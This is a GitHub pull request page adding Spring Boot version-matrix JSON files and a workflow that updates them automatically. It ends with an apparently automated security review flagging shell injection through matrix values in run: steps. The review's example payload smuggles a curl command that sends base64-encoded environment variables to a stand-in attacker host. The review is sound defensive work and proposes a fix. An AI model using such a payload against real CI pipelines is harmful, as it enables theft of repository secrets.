Auto update Test Matrix for Spring Boot #4743
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| { | ||
| "versions": [ | ||
| "2.4.13", | ||
| "2.5.15", | ||
| "2.6.15", | ||
| "2.7.0", | ||
| "2.7.18" | ||
| ] | ||
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| { | ||
| "versions": [ | ||
| "3.2.12", | ||
| "3.3.13", | ||
| "3.4.13", | ||
| "3.5.13" | ||
| ] | ||
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,6 @@ | ||
| { | ||
| "versions": [ | ||
| "4.0.0", | ||
| "4.0.5" | ||
| ] | ||
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,78 @@ | ||
| name: Update Spring Boot Versions | ||
|
|
||
| on: | ||
| schedule: | ||
| # Run every Monday at 9:00 AM UTC | ||
| - cron: '0 9 * * 1' | ||
| workflow_dispatch: # Allow manual triggering | ||
| pull_request: # remove this before merging | ||
|
|
||
|
|
||
| permissions: | ||
| contents: write | ||
| pull-requests: write | ||
|
|
||
| jobs: | ||
| update-spring-boot-versions: | ||
| runs-on: ubuntu-latest | ||
| steps: | ||
| - name: Checkout repository | ||
| uses: actions/checkout@v5 | ||
| with: | ||
| token: ${{ secrets.GITHUB_TOKEN }} | ||
|
|
||
| - name: Set up Python | ||
| uses: actions/setup-python@v6 | ||
| with: | ||
| python-version: '3.11' | ||
|
|
||
| - name: Install dependencies | ||
| run: | | ||
| pip install requests packaging | ||
|
|
||
| - name: Update Spring Boot versions | ||
| id: update_versions | ||
| run: python scripts/update-spring-boot-versions.py | ||
|
|
||
| - name: Check for changes | ||
| id: changes | ||
| run: | | ||
| if git diff --quiet; then | ||
| echo "has_changes=false" >> $GITHUB_OUTPUT | ||
| else | ||
| echo "has_changes=true" >> $GITHUB_OUTPUT | ||
| fi | ||
|
|
||
| - name: Create Pull Request | ||
| if: steps.changes.outputs.has_changes == 'true' | ||
| uses: peter-evans/create-pull-request@v7 | ||
|
Contributor
There was a problem hiding this comment.
|
||
| with: | ||
| token: ${{ secrets.GITHUB_TOKEN }} | ||
| base: feat/spring-boot-matrix-auto-update | ||
| commit-message: "chore: Update Spring Boot version matrices" | ||
| title: "Automated Spring Boot Version Update" | ||
| body: | | ||
| ## Automated Spring Boot Version Update | ||
|
|
||
| This PR updates the Spring Boot version matrices in our test workflows based on the latest available versions. | ||
|
|
||
| ### Changes Made: | ||
| ${{ steps.update_versions.outputs.changes_summary || 'See diff for changes' }} | ||
|
|
||
| ### Update Strategy: | ||
| - **Patch updates**: Updated to latest patch version of existing minor versions | ||
| - **New minor versions**: Added new minor versions and removed second oldest (keeping minimum supported) | ||
| - **Minimum version preserved**: Always keeps the minimum supported version for compatibility testing | ||
|
|
||
| This ensures our CI tests stay current with Spring Boot releases while maintaining coverage of older versions that users may still be using. | ||
| branch: automated-spring-boot-version-update | ||
| delete-branch: true | ||
| draft: false | ||
|
|
||
| - name: Summary | ||
| run: | | ||
| if [ "${{ steps.changes.outputs.has_changes }}" = "true" ]; then | ||
| echo "✅ Spring Boot version updates found and PR created" | ||
| echo "${{ steps.update_versions.outputs.changes_summary }}" | ||
| else | ||
| echo "ℹ️ No Spring Boot version updates needed" | ||
| fi | ||
Oops, something went wrong.
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
PR-controlled JSON version file flows into shell
run:step via matrix expression, enabling command injection.github/data/spring-boot-3-versions.json(modifiable in a PR) is read by theload-versionsjob and passed into the matrix; theUpdate Spring Boot 3.x versionstep then expands${{ matrix.springboot-version }}directly inside arun:block. A crafted value such as3.4.1"; curl https://attacker/$(env | base64) #becomes injected shell on the runner. Move the value to anenv:variable (e.g.SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}) and reference$SPRINGBOOT_VERSIONinstead. The identical pattern exists inspring-boot-2-matrix.ymlandspring-boot-4-matrix.yml.Evidence
.github/workflows/spring-boot-3-matrix.ymlline 24:load-versionschecks out the PR ref (actions/checkout@v5with no override) and pipes.github/data/spring-boot-3-versions.jsondirectly throughjq -c .versionsinto$GITHUB_OUTPUT; PR authors can change that JSON in this PR (spring-boot-3-versions.jsonis in the diff).fromJSON(needs.load-versions.outputs.matrix).Update Spring Boot 3.x versionstep (~line 78) interpolatesspringboot_version="${{ matrix.springboot-version }}"inside arun:script, so GitHub expands the expression into shell before execution — classic script injection.pull_request(notpull_request_target), so fork PRs run without secrets and with a read-onlyGITHUB_TOKEN; impact is bounded to arbitrary code on the runner, PR-scoped cache poisoning, and abuse of the runner. For same-repo branch PRs the job-levelGRADLE_ENCRYPTION_KEYandCODECOV_TOKENare present and exfiltratable, but only collaborators can open such PRs.Also found at 1 additional location
.github/workflows/spring-boot-2-matrix.yml:39Identified by Warden security-review · JNS-EE5